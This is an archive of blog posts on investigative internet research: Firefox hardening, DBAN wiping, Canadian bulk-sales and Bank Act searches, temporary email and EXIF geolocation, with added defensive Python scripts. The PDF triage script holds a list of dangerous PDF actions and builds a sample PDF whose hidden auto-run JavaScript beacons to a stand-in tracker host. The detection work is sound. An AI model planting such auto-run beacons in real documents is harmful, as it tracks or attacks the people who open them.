Archive for the 'Methods' Category

Firefox V.10

The biggest change in V.10 that most Firefox users will see is the smaller number of add-ons marked as incompatible. About 80 percent of all add-ons should now be compatible. Previously, most add-ons would break when Firefox released a major update.

V.10 seems to work much better than any V.9 iteration. No more crashing and the add-ons and extensions work properly. I guess I will be able to stay with Firefox for a while yet.

Extended Support Release

Mozilla also released an enterprise version of Firefox, the ESR (Extended Support Release), which moves to a new major version only about once a year while still receiving security fixes in between, so that businesses don’t have to worry about their internal tools and security policies breaking with every release. This should help make Firefox more popular in the corporate world.


Remote File Handling

High Risk Files

When doing IIR, I often come across files that I don’t want to handle for security reasons: Word documents, PDF documents, PostScript, or even gzipped PostScript files. These files may carry malicious code, and sometimes I don’t want any record of viewing the file on my computer. To accomplish this the file must be loaded remotely and safely so that it never touches my own system. For a true remote view the browser’s web cache should be disabled, and the swap and home partitions should be encrypted if the whole disk isn’t, so that nothing the viewer renders can later be recovered locally.

Unless you verify each file against a checksum or signature published by a trusted source (an MD5 or SHA checksum, or a GPG signature), there is a chance it has been trojaned, or that it contains “phone home” instructions or some other malicious feature. A checksum only proves the file is the one the publisher released, not that the publisher’s file is benign. So if I don’t want to be recorded as a recipient of the file via something like ReadNotify, the file must be verified clear of such code or it must be viewed remotely.
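Two checks I run on a downloaded document before it is opened anywhere that matters, as an added example of my own (not code from the original post or from any of the tools it mentions): a constant-time comparison of the file’s SHA-256 against a hash obtained out of band, and a scan of a PDF for the name objects that introduce code execution or outbound requests, looking inside FlateDecode streams and resolving #xx name escapes so that the obvious evasions don’t hide them. The sample PDF, its beacon URL and the keyword list are all constructed here for the example.

```python
"""Added example (mine, not from the original post): two checks to run on a
downloaded document before it is opened anywhere that matters.  The sample
PDF is constructed inline, and the SUSPICIOUS list is my own selection."""
import hashlib
import hmac
import re
import zlib

# PDF name objects that introduce code execution or outbound requests.
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/Launch", b"/OpenAction", b"/AA",
              b"/URI", b"/SubmitForm", b"/GoToR", b"/EmbeddedFile", b"/RichMedia"]
URL_RE = re.compile(rb"https?://[^\s'\"()<>]+")


def sha256_matches(data, expected_hex):
    """True if data hashes to the value published by the sender (compared in constant time)."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected_hex.lower())


def unescape_names(data):
    """Resolve #xx escapes in PDF names: /J#61vaScript is /JavaScript to a reader but not to a grep."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def inflated_streams(data):
    """Yield the decompressed body of every stream that inflates cleanly as FlateDecode."""
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            pass                      # not Flate (image data, other filters): skip


def scan_pdf(data):
    """Return {"names": {keyword: count}, "urls": [...]} over the raw file and its inflated streams."""
    views = [unescape_names(data)] + [unescape_names(s) for s in inflated_streams(data)]
    names = {}
    for kw in SUSPICIOUS:
        pat = re.compile(re.escape(kw) + rb"(?![A-Za-z0-9])")   # /JS must not match /JSOther
        n = sum(len(pat.findall(v)) for v in views)
        if n:
            names[kw.decode()] = n
    urls = sorted({u.decode("latin-1") for v in views for u in URL_RE.findall(v)})
    return {"names": names, "urls": urls}


def build_sample_pdf():
    """Constructed sample: a one-page PDF whose OpenAction runs JavaScript hidden in a
    compressed stream behind a #-escaped name.  The beacon URL is fictional."""
    js = b"app.launchURL('http://tracker.example/beacon?id=42');"
    body = zlib.compress(js)
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
            b"4 0 obj << /S /J#61vaScript /JS 5 0 R >> endobj\n"
            b"5 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + body + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    pdf = build_sample_pdf()
    print("sha256 ok:", sha256_matches(pdf, hashlib.sha256(pdf).hexdigest()))
    report = scan_pdf(pdf)
    for name, count in report["names"].items():
        print(f"{name:14} x{count}")
    for url in report["urls"]:
        print("outbound:", url)
```

A hit on /OpenAction together with /JavaScript is exactly the “runs something the moment you open it” pattern, and any URL that only appears after inflation is worth treating as a beacon. The scan is a triage aid, not a verdict: a PDF with no hits can still exploit a parser bug, which is why the page’s remote-viewing rule stands.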

The Remote File Viewer

I use the site at http://view.samurajdata.se/. I have only used it with PDF and Word documents. PDF and Word files are transformed into single paged graphics which you may navigate through. Most of the time it works, occasionally a PDF does not load. It doesn’t require Flash and works without cookies or javascript enabled.

I don’t know anything about the site’s privacy policy or how it might affect anonymity. By design the service sees whatever URL or file you give it and fetches the document on your behalf, so the origin server sees the service’s request rather than yours, while the service itself sees both.


The Clean Machine

When doing IIR, the computers must be free of malicious code (S. 31 Canada Evidence Act). We often set aside a computer for this purpose after doing some Spring-Cleaning. But how we prepare the machine for the installation of the clean version of the OS and application software is important.

We use Darik’s Boot and Nuke (“DBAN“), a self-contained boot disk that securely wipes the hard disks of most computers. DBAN automatically and completely deletes the contents of any hard disk it can detect, which also makes it an appropriate utility for bulk or emergency data destruction. DBAN is a means of ensuring due diligence in computer preparation for IIR. It is also a thorough way to rid a Microsoft Windows installation of viruses and spyware, since nothing on the disk survives and the OS is reinstalled from clean media afterwards. Two caveats: DBAN only reaches the sectors the drive exposes to the operating system (it may not cover a Host Protected Area, remapped blocks or the spare area of an SSD, where the drive’s own ATA Secure Erase is the right tool), and it does nothing about firmware.
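The check I would run before reinstalling, as an added example of my own (not part of DBAN or the original post): after a wipe method whose final pass writes zeros (DBAN’s quick erase does), read the whole device back and confirm that no non-zero byte remains, reporting the offset of the first one so a partial wipe or a missed device is obvious. The two image files it checks are constructed in a temporary directory to stand in for a wiped and a partly wiped device; on a real machine pass the device node (for example /dev/sdb) and run as root.

```python
"""Added example: verify a zero-fill wipe by reading the device back.
Not part of DBAN or the original post.  Run as root against a device node
(e.g. /dev/sdb); the temp files built below stand in for real devices."""
import os
import tempfile

CHUNK = 1 << 20  # read 1 MiB at a time so a whole disk never sits in memory


def first_nonzero(path, chunk=CHUNK):
    """Return the offset of the first non-zero byte, or -1 if every byte is zero.

    Reading the whole device is the point: a wipe that skipped the tail of the
    disk, or a device DBAN never detected, shows up here as an early offset.
    """
    zeros = bytes(chunk)
    with open(path, "rb") as f:
        offset = 0
        while True:
            block = f.read(chunk)
            if not block:
                return -1
            if block != zeros[: len(block)]:
                # locate the exact byte so the report can be checked by hand
                return offset + next(i for i, b in enumerate(block) if b)
            offset += len(block)


def verify_wipe(path):
    """True if the device reads back entirely as zeros."""
    return first_nonzero(path) == -1


def make_samples(directory):
    """Constructed stand-ins: one fully zeroed 'disk', one with a leftover byte."""
    clean = os.path.join(directory, "clean.img")
    dirty = os.path.join(directory, "dirty.img")
    with open(clean, "wb") as f:
        f.write(bytes(3 * CHUNK + 17))                         # odd size: exercises the short last read
    with open(dirty, "wb") as f:
        f.write(bytes(2 * CHUNK + 5) + b"\x4d" + bytes(100))   # stray byte deep in the image
    return clean, dirty


def demo():
    """Build the two samples in a temp dir and return each first non-zero offset."""
    with tempfile.TemporaryDirectory() as d:
        clean, dirty = make_samples(d)
        return first_nonzero(clean), first_nonzero(dirty)


if __name__ == "__main__":
    for label, off in zip(("clean", "dirty"), demo()):
        print(label, "wiped" if off == -1 else f"non-zero byte at offset {off}")
```

Keep the offset in the preparation notes alongside the DBAN log: a zero result is the evidence that the machine started clean, and a non-zero one tells you exactly where to look.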


Securing Firefox – Configuration Settings

This is about stopping the dreaded disease, Data Diarrhea. The websites you visit can leave behind a trail of data on your computer and in their server logs. All of this Data Diarrhea can identify the Investigator and this can complicate the problem he is trying to solve. Lax privacy & configuration settings may also leave the Investigator’s computer vulnerable to attack by hackers.

This article describes more advanced methods of customizing Mozilla applications, by editing the configuration files.

about:config entries

about:config is a feature of Mozilla applications which lists application settings (known as preferences) that are read from the profile files prefs.js and user.js, and from application defaults. Many of these preferences are not present in the Options or Preferences dialog. Using about:config is one of several methods of modifying preferences and adding other “hidden” ones.

Editing the user.js and prefs.js files is an alternative method of modifying preferences and is recommended for very advanced users only. Unless you need a prefs.js and/or user.js file modified for a specific purpose, you should use about:config instead.

This article refers to the Firefox V. 9 edition of the browser. These entries may have adverse effects on Thunderbird and Mozilla Suite/SeaMonkey and older versions of Firefox. The settings apply only to the profile you are editing (prefs.js and user.js live inside the profile directory), so repeat them for every profile you use for IIR.

In Firefox, type about:config in the Location Bar (address bar) and press Enter to display the list of preferences. You may get a warning page next; accept it and move on.

about:config > browser.display.use_document_fonts > change value to 0

0: Never use document’s fonts
1: Allow documents to specify fonts to use
2: Always use document’s fonts (deprecated)

With 0, pages are rendered in your own default fonts and the fonts a site specifies (including downloaded web fonts) are ignored. Otherwise a site can probe which fonts are installed on your computer, which helps fingerprint the machine, and downloaded font files are one more kind of untrusted input the browser has to parse.

about:config > browser.sessionhistory.max_entries > change value to 2

The maximum number of pages in the browser’s session history, i.e. the maximum number of URLs you can traverse purely through the Back/Forward buttons. Default value is 50. Set it to 2 so that the browser keeps only the current page and the one before it. A site cannot read the URLs in your session history, but its scripts can read how long it is, and the whole list is written to the profile’s session store, so a short list limits both what a site can infer and what the profile later reveals about your Investigative Internet Research (IIR) assignment.

about:config > dom.storage.enabled > double click to false

dom.storage.enabled controls DOM Storage, a mechanism that lets web pages store information in the browser (similar to cookies), called “client-side session and persistent storage.” Although use of this storage is subject to the user’s cookie preferences, this preference allows it to be disabled entirely.

about:config > geo.enabled > double click to false

True enables location-aware browsing, and true is the default. You want to disable this. See http://www.mozilla.com/en-US/firefox/geolocation/ for details of geolocation in Firefox.


Securing Firefox – General Privacy Settings

General Firefox Privacy Settings

The basic privacy settings are found in the Options dialog in Firefox 9.0 (Firefox > Options > Options on Windows; Firefox > Preferences on Mac OS X).

  1. Content: Enable “Block pop-up windows” and disable JavaScript when it isn’t needed.
  2. Privacy: Enable DNT (Do Not Track). For History, use custom settings. “Always use private browsing mode” should be enabled. “Remember my browsing history”, “Remember download history” and “Remember search and form history” should be turned off. “Accept cookies from sites”, but un-check “Accept third-party cookies” as they are rarely needed. Location bar: select “Suggest nothing”.
  3. Security: Enable “Warn me when sites try to install add-ons”, “Block reported attack sites” and “Block reported web forgeries”. Under Passwords, disable “Remember passwords for sites” and use a master password.
  4. Advanced – General – System Defaults: Disable “Submit crash reports” and “Submit performance data”.
  5. Advanced – Network – Offline Storage: Check “Override automatic cache management” and limit the cache to 0 MB. Further, you can un-check “Tell me when a website asks to store data for offline use”.
  6. Advanced – Encryption: Ensure “Use TLS 1.0” is enabled. “Use SSL 3.0” is the older, weaker protocol and is only needed for sites that cannot negotiate TLS; leave it on only if a site you need actually fails without it. Then click Validation and check “When an OCSP server connection fails, treat the certificate as invalid”, so that a blocked or failed revocation check is treated as a failure rather than silently ignored.
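Both the about:config entries above and the Options-dialog settings in this section end up as preferences in the profile’s prefs.js (or user.js), so one script can audit a profile against the whole list. This added example is my own, not code from the original post or from Mozilla: the first four expected values are the about:config entries the post lists verbatim; the remaining names are my assumed about:config equivalents of the dialog settings for Firefox 9-era builds, and the sample prefs.js is constructed here. The script parses the file, reports every expected preference that is missing or wrong, and renders the expected set as user.js lines.

```python
"""Added example, not from the original post or from Mozilla: parse a
Firefox profile's prefs.js/user.js, compare it with the IIR settings
recommended above, and emit the user.js lines that would enforce them.
The first four names are the ones the post lists; the rest are my assumed
about:config equivalents of the Options-dialog settings."""
import json
import re

EXPECTED = {
    "browser.display.use_document_fonts": 0,
    "browser.sessionhistory.max_entries": 2,
    "dom.storage.enabled": False,
    "geo.enabled": False,
    # --- assumed equivalents of the Options-dialog settings ---
    "dom.disable_open_during_load": True,       # block pop-up windows
    "privacy.donottrackheader.enabled": True,   # send Do-Not-Track
    "browser.privatebrowsing.autostart": True,  # always use private browsing
    "places.history.enabled": False,            # remember my browsing history: off
    "browser.formfill.enable": False,           # remember search and form history: off
    "network.cookie.cookieBehavior": 1,         # accept cookies, but not third-party
    "signon.rememberSignons": False,            # remember passwords for sites: off
    "browser.cache.disk.enable": False,         # cache limited to 0 MB
    "security.OCSP.require": True,              # OCSP failure => certificate invalid
}

PREF_LINE = re.compile(r'^\s*(?:user_)?pref\(\s*"([^"]+)"\s*,\s*(.+?)\s*\);\s*$')


def parse_prefs(text):
    """Return {name: value} from prefs.js/user.js text; values become bool, int or str."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_LINE.match(line)
        if not m:
            continue                      # comments, blank lines, the file header
        name, raw = m.groups()
        if raw in ("true", "false"):
            prefs[name] = raw == "true"
        elif raw.startswith('"') and raw.endswith('"'):
            prefs[name] = raw[1:-1]
        else:
            try:
                prefs[name] = int(raw)
            except ValueError:
                prefs[name] = raw         # leave anything unexpected as-is
    return prefs


def audit(prefs, expected=EXPECTED):
    """Return {name: (actual, wanted)} for every expected pref that is missing or wrong.

    A missing entry is reported as None: prefs.js only records preferences that
    differ from the build's defaults, so 'absent' means 'still at the default'.
    """
    return {name: (prefs.get(name), want)
            for name, want in expected.items() if prefs.get(name) != want}


def user_js(expected=EXPECTED):
    """Render the expected settings as user.js lines (json.dumps yields the JS literals)."""
    return "\n".join(f'user_pref("{k}", {json.dumps(v)});' for k, v in expected.items()) + "\n"


# Constructed sample profile: two settings right, one wrong, the rest untouched.
SAMPLE_PREFS_JS = '''# Mozilla User Preferences
/* Do not edit this file. */
user_pref("geo.enabled", false);
user_pref("browser.sessionhistory.max_entries", 50);
user_pref("network.cookie.cookieBehavior", 1);
user_pref("browser.startup.homepage", "about:blank");
'''

if __name__ == "__main__":
    for name, (actual, wanted) in sorted(audit(parse_prefs(SAMPLE_PREFS_JS)).items()):
        print(f"{name}: is {actual!r}, want {wanted!r}")
    print(user_js())
```

The profile directory is shown under about:support. Close Firefox before reading or writing either file: prefs.js is rewritten on exit, whereas a user.js in the same directory is read at every start and overrides prefs.js, which is what makes it the durable place to keep these settings.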



The Cost of Investigative Internet Research

“Why does it cost so much just to look on the Internet?”

I get this question a lot, and too often from “professionals” who should know better. I will list a few of the reasons here.

To begin with, I never know how the research results will be used in the future. That means that the results must be properly documented so that it would be reproducible if someone else with similar skill did the searches at the same time as I did.

If at some future date what I find becomes important evidence, then how it was found, where it was found, when it was found, and what it actually looked like becomes very important. My report and the supporting material may be the only proof of the existence of the material being entered into evidence.

The computers must be free of malicious code (S. 31 Canada Evidence Act). We often set aside a computer for this purpose after doing some Spring-Cleaning.

The logic of the research process must be clear and easy to explain to anyone. This logic must be explained in the report. Search statements must be recorded. The project directory and file naming and structures must be logical and properly documented. The evidence must have a clear and documented chain of custody.

Providing this evidence requires skill, training, experience, software, computers, office space, support staff, and time. Finally, did you know it takes at least twice as long to write the report as it does to do the research?


Security & Privacy Add-ons for Firefox

Firefox is the online researcher’s best friend. No other browser gives so much control to the user as Firefox. It is more customizable than either Google Chrome or Internet Explorer.

Like any browser, you must be aware of what data you are releasing when you visit a Web site. The following add-ons help eliminate two serious security threats that occur when doing Investigative Internet Research (IIR).

BetterPrivacy—This add-on is pretty basic, but a must have. BetterPrivacy deletes flash cookies (LSOs/SuperCookies).

KeyScrambler—Check out Alex Long’s post from Null Byte for information about what KeyScrambler is and how it works.

I have already written about:

  • NoScript— NoScript allows JavaScript, Java and other executable content to run only from trusted domains of your choice, e.g. your home-banking web site, and guards the “trust boundaries” against cross-site scripting attacks (XSS). Such a preemptive approach prevents exploitation of security vulnerabilities (known and even unknown!). This is a must-have for IIR.
  • HTTPS Everywhere—This is a must-have add-on from the Electronic Frontier Foundation. It carries a list of rules that rewrite requests to sites known to support HTTPS, so the encrypted version of the site is used automatically. For example, most people use the unencrypted version of Google search; with this add-on the request is redirected to Google’s HTTPS version. It cannot encrypt a connection to a site that offers no HTTPS at all. The DuckDuckGo (DDG) search engine also uses a version of this.


The Next Browser

I’m a digital troglodyte that doesn’t like change, but sometimes there is no avoiding it.

Recently, Google stopped paying Mozilla for the little Google search window at the top right of the Firefox browser. Google has paid Mozilla about $1 per copy to have that window. Last year, that Google search window accounted for 84% of Mozilla’s $123 million of revenue, or about $100 million. However, Google’s Chrome browser has made remarkable strides against Firefox and the rest of the browser field.

The loss of funding to support Firefox, and Chrome’s association with the largest search engine, may herald the end of Firefox. No other browser gives so much control to the user like Firefox does. Most users don’t understand that Firefox is more customizable than either Google Chrome or Internet Explorer. If Mozilla doesn’t find a way to replace the lost revenue, then expert searchers may lose their most fundamental and productive tool. That will lead to a forced change for this digital troglodyte expert searcher.


Programme Cheatsheets

MakeUseOf Cheat Sheets list shortcuts for common programmes that you use daily. These will make you more productive.


Copernic Agent & Google

I have used Copernic for years, and just accepted its lack of a Google search.  I just got used to it, and never sought a way to add Google.

At a recent conference, Kevin Ripa told me that a registry entry would solve the problem after I mentioned that it didn’t search Google. If you’re going to feel like an idiot, it’s good to be shown up by a really smart guy like Kevin.

Go to the registry key:

[HKEY_CURRENT_USER\Software\Copernic\Agent\System]

and add a string value named:

EngineUpdateAddress

with the data:

http://updates.copernic.com/k2upd/agentex


Bulk Sales & the PI

BULK SALES ACT SEARCHES – Ontario Only

Sales of large quantities of stock or the sale of assets and equipment of the business itself outside the regular course of business are considered a sale “in bulk”. The Bulk Sales Act is designed to protect the creditors of a business owner by requiring the owner to follow the procedures of the Act for sales outside the regular course of business.

If a buyer wishes to purchase the assets and equipment of a business, the seller “in bulk” must provide an affidavit stating that all creditors have been paid, or that they will be paid from the proceeds of the sale. In some cases the buyer pays an assigned trustee, and creditors of the business may wish to waive their rights, in which case the proceeds are paid out.

A ‘Bulk Sales search‘ determines if a bulk sales affidavit has been filed with the relevant Ontario Superior Court of Justice office.

The Private Investigator (PI)

If you are interested in an Ontario business’s assets, debts, cash flow, and general financial condition, then a Bulk Sales Act search is an important search. It may tell you if the business is failing or if it has suffered a set-back. You may learn of an abandoned line or the sale of a production facility. You may learn of a legal action in another jurisdiction by contacting or researching the other parties to the bulk sale. Any sale that indicates that creditors will be paid from the proceeds may point to a judgment that is being satisfied, or it may be part of the settlement of a claim.


The Bank Act & the PI

The Bank Act

The Bank Act (1991, c. 46) is an Act of the Government of Canada respecting banks and banking.  The Canadian banking industry includes 20 domestic banks, 24 foreign bank subsidiaries and 22 foreign bank branches operating in Canada.

Canadian Banks & Lending

Canadian Banks have the right to lend money to wholesalers, retailers, shippers and dealers in “products of agriculture, products of aquaculture, products of the forest, products of the quarry and mine, products of the sea, lakes, and rivers, of goods, wares and merchandise, manufactured or otherwise” on the security of such goods or products, and to lend money to manufacturers on their goods and inventories.

The Private Investigator (PI)

When doing a background investigation of a person, the PI will be looking for previously unknown assets, banking and financial arrangements, or corporate affiliations.  When investigating a company, the PI will be looking for previously unknown assets, banking, and financial arrangements.  In both cases, the equity held by the subject in the assets will be of interest.  Searching the Bank Act Security Registry may reveal all of the above.

Bank Act Security Registry

Under S. 427 of the Bank Act, the borrower signs a document that gives the bank a first preferential lien on the goods or equipment. The bank then registers a ‘Notice of Intention‘ to take the goods as security, which perfects its security interest.

The Bank of Canada maintains the Bank Act Security Registry, which may be searched for these registrations. Note that the Bank of Canada only keeps the registry: the lender is the chartered bank that filed the notice. The search will reveal whether a chartered bank has taken security on property that may interest you. If a bank does have a claim on the property, then it has loaned the customer money and has the right to take possession of and sell the property if the loan is not paid. This is important for you to know for two reasons. First, it shows that the person or business is indebted to a Canadian chartered bank and may have equity in the property listed in the security agreement. Second, it may uncover previously unknown assets, banking and financial arrangements, or corporate affiliations. You will need to provide the name of the person or business being searched.

Years ago, we only did this when we suspected the subject person or company might have an interest in an agricultural business.  Today however, we find more non-agricultural businesses in the Bank of Canada registry. We have online access to the Bank of Canada registry to search for Bank Act Security items. The search results often indicate that a business assigned its inventory to a bank as security under the Bank Act.

A manual search for Notices of Intention filed under Section 427 of the Bank Act is conducted at the agency of the Bank of Canada in the province or territory where the debtor’s place of business is located. For Bank Act searches, “agency” means, in a province, the office of the Bank of Canada or its authorized representative, but does not include its Ottawa office; in Yukon, the Northwest Territories and Nunavut it means the office of the clerk of the court of each of those territories respectively [see S. 427(5)].


Power-Searcher Add-ons for Firefox

WorldIP

This displays the IP address of the page you are visiting and the IP data that you are revealing about yourself. The IP data seems more up-to-date than a whois search.

Ghostery

Ghostery  lets you see who’s tracking your web browsing when you visit a webpage. It looks for third party page elements (3pes) on the web pages you visit. These can be things like social network plugins, advertisements, invisible pixels used for tracking and analytics, etc. Ghostery notifies you that these things are present, and which companies operate them. You can learn more about these companies, and if you wish, choose to block the 3pes they operate.

LongURLPlease

This replaces short URLs with the originals, so you can see where links will send you before you click.


Temporary Email Addresses

An email address is often required to download a file or to complete a registration page. Unfortunately, that address often becomes a target for spam, and you may not want anybody to know you have registered for that site. A temporary email address solves both problems.

Mailinator

Mailinator requires no sign-up. Send email to any name at mailinator.com and the inbox is created automatically. You cannot send mail from it. Visit mailinator.com, type the email name where it says “Check your inbox!”, then click “Go!”, and Mailinator will display the list of email waiting. There is no password, so anyone who guesses or sees the address can read the same inbox. The mailbox will only hold 10 messages at once. All attachments (pictures, binary files, etc.) are stripped out. The mailbox doesn’t disappear on any set schedule.

Use this only for items that don’t require a high level of security. Access your Mailinator inbox only via Tor, and use the address only for signing up to things like Mailinator.

10 Minute Mail

Go to 10 Minute Mail and copy the e-mail address to your clipboard and use it for registration.  Your e-mail address will expire in 10 minutes.

How to Find Out Where a Picture was Taken

Most of the time, there isn’t much information available within the picture itself. However, certain smartphones (the iPhone, for instance) and high-end cameras have GPS built in and geo-tag pictures. Advanced cameras also store metadata such as the model name, exposure settings, etc. Even without the location information, the Exchangeable Image File Format (EXIF) data stored in the image is still useful in the evidence-gathering process.

In Firefox, right click on the image and select Copy Image Location.

Go to http://regex.info/exif.cgi and paste the image location into the Image URL box, then click the View Image at URL button. Be aware that this hands the URL to a third-party service, which then fetches the image: the service learns which picture you are interested in, and the server hosting the picture sees the service’s request instead of yours. For evidence that must stay confidential, extract the metadata locally instead.

The next page displays the EXIF info: information on the camera and, if available, the GPS-based location where the picture was taken. Scroll down for the GPS info or click the map service link in the box on the left side of the page.
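For the cases where the picture should not leave your machine, this added example of my own (not code from the original post or from the regex.info viewer) reads the GPS position straight out of a JPEG’s Exif block: it walks the JPEG marker segments to the APP1/Exif segment, parses the TIFF directory to find the GPS sub-directory, decodes the degree/minute/second rationals and converts them to signed decimal degrees. The sample JPEG, its coordinates and the builder that produces it are constructed here for the example.

```python
"""Added example, not from the original post or from the regex.info viewer:
read the GPS position out of a JPEG's Exif block locally, so that neither
the image URL nor your interest in it is disclosed to a third-party service.
The sample JPEG and its coordinates are constructed here for the example."""
import struct

GPS_IFD_TAG = 0x8825
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1}   # BYTE, ASCII, SHORT, LONG, RATIONAL, UNDEFINED


def find_exif(jpeg):
    """Walk the JPEG marker segments; return the TIFF data inside APP1/Exif, or None."""
    if jpeg[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            return None                                 # lost sync: not a well-formed file
        marker = jpeg[pos + 1]
        if marker == 0xD9 or 0xD0 <= marker <= 0xD8:    # standalone markers carry no length
            pos += 2
            continue
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        segment = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and segment.startswith(b"Exif\x00\x00"):
            return segment[6:]
        if marker == 0xDA:                              # start of scan: only image data follows
            return None
        pos += 2 + length
    return None


def read_ifd(tiff, endian, offset):
    """Return {tag: (type, count, offset_of_value_field)} for the IFD at offset."""
    (n,) = struct.unpack(endian + "H", tiff[offset:offset + 2])
    entries = {}
    for i in range(n):
        e = offset + 2 + 12 * i
        tag, typ, count = struct.unpack(endian + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, count, e + 8)
    return entries


def read_value(tiff, endian, typ, count, field):
    """Decode one IFD entry; values over 4 bytes live at the offset stored in the field."""
    size = TYPE_SIZE[typ] * count
    off = field if size <= 4 else struct.unpack(endian + "I", tiff[field:field + 4])[0]
    raw = tiff[off:off + size]
    if typ == 2:
        return raw.split(b"\x00")[0].decode("ascii", "replace")
    if typ in (3, 4):
        return struct.unpack(endian + ("H" if typ == 3 else "I") * count, raw)
    if typ == 5:
        n = struct.unpack(endian + "I" * (2 * count), raw)
        return [n[i] / n[i + 1] if n[i + 1] else 0.0 for i in range(0, 2 * count, 2)]
    return raw


def gps_position(jpeg):
    """Return (latitude, longitude) in decimal degrees, or None if the file has no GPS tags."""
    tiff = find_exif(jpeg)
    if tiff is None or tiff[:2] not in (b"II", b"MM"):
        return None
    endian = "<" if tiff[:2] == b"II" else ">"
    ifd0 = read_ifd(tiff, endian, struct.unpack(endian + "I", tiff[4:8])[0])
    if GPS_IFD_TAG not in ifd0:
        return None
    gps = read_ifd(tiff, endian, read_value(tiff, endian, *ifd0[GPS_IFD_TAG])[0])
    # GPS tags: 1 LatitudeRef, 2 Latitude, 3 LongitudeRef, 4 Longitude
    vals = {t: read_value(tiff, endian, *gps[t]) for t in (1, 2, 3, 4) if t in gps}
    if len(vals) < 4:
        return None

    def to_decimal(dms, ref):
        d, m, s = dms
        dec = d + m / 60 + s / 3600
        return -dec if ref in ("S", "W") else dec

    return (round(to_decimal(vals[2], vals[1]), 6), round(to_decimal(vals[4], vals[3]), 6))


def build_sample_jpeg(lat, lat_ref, lon, lon_ref):
    """Constructed test input: a JPEG skeleton holding only an Exif/GPS block.
    lat and lon are (degrees, minutes, tenths of a second); little-endian TIFF."""
    E = "<"

    def rational(dms):
        return struct.pack(E + "6I", dms[0], 1, dms[1], 1, dms[2], 10)

    ifd0 = struct.pack(E + "H", 1) + struct.pack(E + "HHII", GPS_IFD_TAG, 4, 1, 26) + struct.pack(E + "I", 0)
    gps = (struct.pack(E + "H", 4)
           + struct.pack(E + "HHI", 1, 2, 2) + lat_ref.encode().ljust(4, b"\x00")
           + struct.pack(E + "HHII", 2, 5, 3, 80)
           + struct.pack(E + "HHI", 3, 2, 2) + lon_ref.encode().ljust(4, b"\x00")
           + struct.pack(E + "HHII", 4, 5, 3, 104)
           + struct.pack(E + "I", 0))
    tiff = b"II" + struct.pack(E + "HI", 42, 8) + ifd0 + gps + rational(lat) + rational(lon)
    payload = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload + b"\xff\xd9"


if __name__ == "__main__":
    sample = build_sample_jpeg((45, 25, 162), "N", (75, 41, 528), "W")   # constructed position
    print(gps_position(sample))                 # the constructed position in decimal degrees
    print(gps_position(b"\xff\xd8\xff\xd9"))    # None: a JPEG with no Exif segment
```

Run it against the downloaded file with `gps_position(open(path, "rb").read())`. Record the raw Exif bytes with the image in the case directory as well: the decimal conversion is a derived value, and the original tags are what you will be asked to produce.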